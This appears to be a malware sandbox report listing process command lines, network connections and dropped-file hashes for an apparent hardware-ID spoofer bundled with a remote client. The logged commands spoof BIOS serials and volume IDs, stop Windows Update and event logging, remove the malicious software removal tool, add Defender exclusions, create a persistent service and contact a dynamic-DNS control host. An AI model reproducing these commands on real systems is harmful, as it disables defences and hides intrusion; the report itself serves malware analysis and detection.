C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 818001HP-TRGT20151SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 218001HP-TRGT20151RV
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 18001HP-TRGT20151AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 218021HP-TRGT19106RV
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 418021HP-TRGT19106FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 518021HP-TRGT19106SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 718021HP-TRGT19106MST
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 318021HP-TRGT19106DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 618021HP-TRGT19106FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 818021HP-TRGT19106SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 18021HP-TRGT19106AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: MZCZ-INRS
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: MZCZ-INRS
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: CTKV-Z543
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: CTKV-Z543
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 3ZBA-R7ET
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 3ZBA-R7ET
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 9208-Z9JG
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 9208-Z9JG
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "driverupdate"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "driverupdate"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U35-0TJ9
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U35-0TJ9
C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: ED8I-JG46
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: ED8I-JG46
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: HI6V-FLNM
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: HI6V-FLNM
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3MG1-LPM1
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3MG1-LPM1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 5OID-I6E4
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 5OID-I6E4
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: I75N-FRZC
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: I75N-FRZC
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KO8Z-OEZ1
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KO8Z-OEZ1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: ZDOC-BT66
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: ZDOC-BT66
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: NVKV-9KBJ
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: NVKV-9KBJ
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: N28T-B91O
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: N28T-B91O
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: KPPR-9I8R
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: KPPR-9I8R
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: RLKL-STNJ
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: RLKL-STNJ
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 4G61-O3S9
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 4G61-O3S9
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 4VA6-VHUD
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 4VA6-VHUD
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: C2EU-LHH0
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: C2EU-LHH0
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: DK4V-OGG2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: DK4V-OGG2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 75VK-CPEA
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 75VK-CPEA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 4398-NFSD
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 4398-NFSD
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 66DN-BEGB
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 66DN-BEGB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | brofisthej.ddns.net | udp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | 204.186.70.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:443 | ipwho.is | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.197.79.40.in-addr.arpa | udp |
Files
memory/4368-0-0x0000000074E70000-0x0000000075421000-memory.dmp
memory/4368-1-0x0000000074E70000-0x0000000075421000-memory.dmp
memory/4368-2-0x0000000000FF0000-0x0000000001000000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | 66fa626b4bce82ab7092a3ecc9e26464 |
| SHA1 | 28c23acab5bb0798bd658bc0c1b6ee58b62e127f |
| SHA256 | 34d1668bec7850f9f65281717de74c63beb102c827908392d7ff60796016343b |
| SHA512 | d4e3e0021c9346c55e290c0e1bdb50fd5e05eca2d3e758212aa109b033934c58cd06812e6793501bbe4a8c46d78d5483ed5e52c91251efb50147b144903a8b85 |
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | d3650464ce69bdf60f50afce833ba111 |
| SHA1 | 7fed397d46da661cf80f45a78c437b98b6d2831c |
| SHA256 | f13a3314d5b03838ae32af4bc7bb05c26d1c1f4e0de17c6e37d99aa49caee426 |
| SHA512 | eda61f16863c20a61114a9f5e8454781c848e260c32b53c718ed516e35d9283f08f06f07df73a323d1f723dde520526039f1b8f423ab0aaea5cccf2375a3ee33 |
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | 713edbdf65816ce84a5ce75aa7ac3ad3 |
| SHA1 | d276e95994a39b413ed2b629209cb3dbc802136b |
| SHA256 | 823a9384f27d331a9e7991243bb0dd3115aac8bf3f98515cb8788d4f1ae78c2e |
| SHA512 | 522a1c5870190f16b411c25fa808d6a0991e74685c4f9273848645290087e9eb664a96141208c7c3a872587bae77e6c7be27752fa9174fc21f86c8de00889f79 |
memory/720-14-0x0000000000F50000-0x0000000001274000-memory.dmp
memory/720-15-0x00007FFC12DC0000-0x00007FFC13881000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
| MD5 | 723e825804762facdfbaebbf60cbb674 |
| SHA1 | a357f06c7f787c5dc4cd1cf8b9d65b9f45480c2a |
| SHA256 | 044c101b3d148d5163eed4250fcdde3aab86464e6989f37c8c2cbfe22afb1acc |
| SHA512 | e8f8d65d6b91c852e28ee79a0f48ed10223c046ba86f1683de2277b17092e6c08f26c74a3a1b76cec5eb69b68c144328e4993caabe778fe9eae767e23f1dcfc4 |
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
| MD5 | 305bdeb79f8c6a2ec5488e693073d941 |
| SHA1 | 6144777c72d2d67caf1b6b66b7916faea48f67c0 |
| SHA256 | 8db2fd4cddaaeef002c3e518a62c8045fc9665b8e1114f238b21df72bed9b343 |
| SHA512 | e0cbb9264fbd63728239087d9ad34c86e296b218b5af4daedb98568553c069ad026f97deb552e1d852f93c3ee9e886d38bd9efd11d4c65c5ef069662365221eb |
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
| MD5 | 34223d88b2dc739c79332bf4b9ac5673 |
| SHA1 | 6954054728a6c7eaa9b3cc6b449324a678588167 |
| SHA256 | 99fb81c5a8578e26009322ca9696e4fc491b935dd93f8adaae32989d22d4e869 |
| SHA512 | f9e14c207f9fb351a642bf1e48d1667ce440488a56ff76953cc35500bcf0d2fdcf8aa7857a75b8f930c6becbcdb03c8e8d4656ee203626a8d56bce7cd963bef8 |
memory/4368-28-0x0000000074E70000-0x0000000075421000-memory.dmp
memory/2192-29-0x0000000000400000-0x0000000001274000-memory.dmp
memory/2192-30-0x000000007FA70000-0x000000007FE41000-memory.dmp
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
| MD5 | 5f1caa7064b3cd10dce90ad8d05c40d8 |
| SHA1 | 1d2e542a6644ae4b74928af176a7d172b6a906c5 |
| SHA256 | 2cf9d501a2707d1ac789f48a11df829cdf9be6ec55606f9764ef718e6d7d4a05 |
| SHA512 | 43fc031ec8224a226a88b426e96b1cc185bf51c561c303c46da2b8f88a76a6354079a97f52523e925b5c8d2772a0484bde22283f4ae259a68ad8f36c1e64e077 |
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | fcebbed65850b574d85c480598572622 |
| SHA1 | 6766b0ea9015d174bbb412ebc533cff1a43322db |
| SHA256 | ddcf5e9c3cc82f4ac80acc9f2d69397574daf3521f2ea550d8a485a5f11b11c4 |
| SHA512 | 6ab205d01191f8623cad01cd000292d98538c68d0db4ac38e476b3afb0fe13da45f3ef73b9b49a1dc868e9e2996e33f926ee429e7569fe420cd49a1bd41a8440 |
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | 717959ed2769e3f1b7f44a676677e144 |
| SHA1 | 9e3dee726a699fda88ac85f30443202c16d41c7e |
| SHA256 | b2ec811dc3efc55eaaf25f4e6850b11ff656ebb9c3a5a7a7c3e7e4580f9622a0 |
| SHA512 | 452f3c416cc2ae19ee63374bfe57ffd1ba37c63fde1b1dbff22dd6963a1a294713b74953ecc2d77b9a1f09762ef825a1ffcbf2808dc4f10054c01f36955276e1 |
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
| MD5 | 063e00d709dd8afe815123b6fd8087cc |
| SHA1 | 812cc71d9b8af78d34bffa937870fe9632f97c98 |
| SHA256 | f11c459c9b47e250943a74cbd2fd662917c8eaf2cefdb439d165f0b64653044f |
| SHA512 | 1f711be8b3c66f09ce1c77dc0b6f3d258e0cafffad2925b56353bac78fc92449ec6e3254612616e575914203a8e9c5d7a6dc96b1dbb6f4d3d0eea8b37152fc85 |
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | df98dd1232971341b4781f5a7525774c |
| SHA1 | c04024b07ecdb4f213b1b8236d497fffd4d2b307 |
| SHA256 | d3bd6f91c60444b3cfdf63f2ab2996b4c24abc15052693c11ecc9f14c9fddcac |
| SHA512 | e6e04b4a8b505ecc6a2914095630b7119792703fc52a51d695f9a921df9cdc1eb354b20186287049f68ac230418ede1aabf1c594b3cc00cd959a00bf6cf95d1a |
memory/2760-57-0x00000000006E0000-0x00000000007CA000-memory.dmp
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
| MD5 | 97db1fc64a189721a25cfa12ffa46e11 |
| SHA1 | d6e81c606f30405e9bc15b5c130d7ce7599b2811 |
| SHA256 | 8bb069abd46b402f69c1f0ba3bd8a0d36637e8ede490637fd3a95211fc038037 |
| SHA512 | b39e87910236207e9b773c0b5e9efd91888d0dfd7e6085cc5c238ef32421b94b9521f81c277a04e44d05e58e873ae5fd275c597751f723392774a593cbb35d4f |
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
| MD5 | 53fc5532eff1554d002dd16f2e2f68d2 |
| SHA1 | c53936133df8feabca0e8b90f841dbe1b847b1a1 |
| SHA256 | fb6c693fd1a75e18c45a84184c1ead7853ab4f751459a08ae4126d5e1c00e70f |
| SHA512 | 1d516534175239a05e753e67b036f8001c9bfa3b7ed0a0798ddb55a56489a3bce5e28aa48858dc00be5824eebc8087dfa11ea64c036d19f55cfe0adb6b925c62 |
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | 16fe4a11d4e2fa589fb75fa74390ab76 |
| SHA1 | 6971282ae6d78967b67d75eccdf9110797f7640b |
| SHA256 | 88651fde7e9bbe60fbc6684d60831d0cce118383d06b5b224454b555e9de4e45 |
| SHA512 | b85a9388b84a9e48136596cf651867c870dd836c4a97fb018d070ebeefa4369177817f03de73aa4d0ac5d1ea95f9af5f0e30284b0ea030e6a33e8ac70267d5c0 |
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | 4949aea9e9235198da71c92eb2b0a16a |
| SHA1 | 92f173f525217806b2b4d6b2cd84a3ca9337b105 |
| SHA256 | a38dd7f9620f9dd86a65cb0bd50631faff5c33bd68fdd95e1c4d195d55aa5058 |
| SHA512 | b2f3ca8c480129daa360542dd63fa4fd81f6d12a52b87d533eac488a5280f3d056d4391cbb8effebeb8aaa62bcfef2f319743edb5c1076b8fb4b257f7bb84385 |
memory/1948-70-0x0000000073440000-0x0000000073BF0000-memory.dmp
memory/720-82-0x00007FFC12DC0000-0x00007FFC13881000-memory.dmp
memory/1948-81-0x00000000048F0000-0x0000000004926000-memory.dmp
memory/2440-84-0x00007FFC12DC0000-0x00007FFC13881000-memory.dmp
memory/1948-86-0x00000000049A0000-0x00000000049B0000-memory.dmp
memory/2440-87-0x000000001B050000-0x000000001B060000-memory.dmp
memory/1948-85-0x0000000004FE0000-0x0000000005608000-memory.dmp
memory/2760-89-0x0000000000F80000-0x0000000000F8E000-memory.dmp
memory/2760-91-0x00007FFC31760000-0x00007FFC31761000-memory.dmp
memory/2760-90-0x00007FFC31770000-0x00007FFC3182E000-memory.dmp
memory/2192-83-0x000000007FA70000-0x000000007FE41000-memory.dmp
memory/2760-93-0x0000000000FD0000-0x0000000000FEC000-memory.dmp
memory/2760-94-0x00007FFC31750000-0x00007FFC31751000-memory.dmp
memory/2192-65-0x0000000000400000-0x0000000001274000-memory.dmp
memory/2760-64-0x000000001B430000-0x000000001B440000-memory.dmp
memory/2760-98-0x0000000000FF0000-0x0000000001008000-memory.dmp
memory/2760-96-0x000000001B300000-0x000000001B350000-memory.dmp
memory/2760-99-0x00007FFC31740000-0x00007FFC31741000-memory.dmp
memory/2760-103-0x00007FFC31730000-0x00007FFC31731000-memory.dmp
memory/2760-106-0x0000000000FB0000-0x0000000000FBE000-memory.dmp
memory/1948-104-0x0000000005870000-0x00000000058D6000-memory.dmp
memory/2760-107-0x00007FFC31720000-0x00007FFC31721000-memory.dmp
memory/2760-117-0x00007FFC31710000-0x00007FFC31711000-memory.dmp
memory/1948-116-0x00000000058E0000-0x0000000005C34000-memory.dmp
memory/2760-123-0x0000000001010000-0x000000000101E000-memory.dmp
memory/2760-115-0x0000000000FC0000-0x0000000000FCC000-memory.dmp
memory/2760-126-0x0000000001070000-0x000000000107C000-memory.dmp
memory/2760-127-0x00007FFC31700000-0x00007FFC31701000-memory.dmp
memory/2760-129-0x00007FFC316F0000-0x00007FFC316F1000-memory.dmp
memory/2760-130-0x000000001B430000-0x000000001B440000-memory.dmp
memory/2440-131-0x00007FFC12DC0000-0x00007FFC13881000-memory.dmp
memory/1948-128-0x0000000073440000-0x0000000073BF0000-memory.dmp
memory/2760-124-0x00007FFC12DC0000-0x00007FFC13881000-memory.dmp
memory/2760-113-0x000000001B430000-0x000000001B440000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t0tyeznn.4yv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1948-102-0x0000000005800000-0x0000000005866000-memory.dmp
memory/2760-101-0x0000000000F90000-0x0000000000F9E000-memory.dmp
memory/1948-95-0x0000000004F00000-0x0000000004F22000-memory.dmp
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
| MD5 | 620878bb7e842d87ea941ce735ddc8b1 |
| SHA1 | 9da839ba3ccc3ee1ffc34ab4a1e308d1f9ae44eb |
| SHA256 | e0a234ba0013256d2644a755d45c71af2293860f3f1c34bbd1c5652185162add |
| SHA512 | cc468a90d56eca5d591b3538cf6795ad7d8a0eba689a4a1b651138c3539ebdb8f005ea7e8e04641a6a4e2e33f731024b122e7a4ea8bd81419045556ce06f3ce3 |
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
| MD5 | e1b3adb31655e45a5ebe6fba5b11686e |
| SHA1 | 76e9ab62559fa7ce7d8d901c169d16b56da436a0 |
| SHA256 | b8efc69c2a9cf69088edaaa271e213c7b84d3e9817c0e6af411ffc832747bab8 |
| SHA512 | 3e2101b4f98791f2975143535e50b6d325147feffe25a72a714281a7bc85e1a755c252ae90490553a758495ea41125106cc1f2335e2a7958a96f9bc1bdd12e05 |
memory/2760-58-0x00007FFC12DC0000-0x00007FFC13881000-memory.dmp
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
| MD5 | da12b0616d6187f2e88d3afafdd4b1d6 |
| SHA1 | 3b08e3278ae88dbfefac8aea01ddf79c7d9a3434 |
| SHA256 | 2429f75260b54f2211274f0fc0fef3734e06799172128b7632d50d60a9837794 |
| SHA512 | 192ca1143dfa7ea0bce94df826ed743458ced6860f5383bf44aea17eb6f29773e9e12210438cca9b0674e2ab4b31edff2b085ebce076b7310199e78a7c141010 |
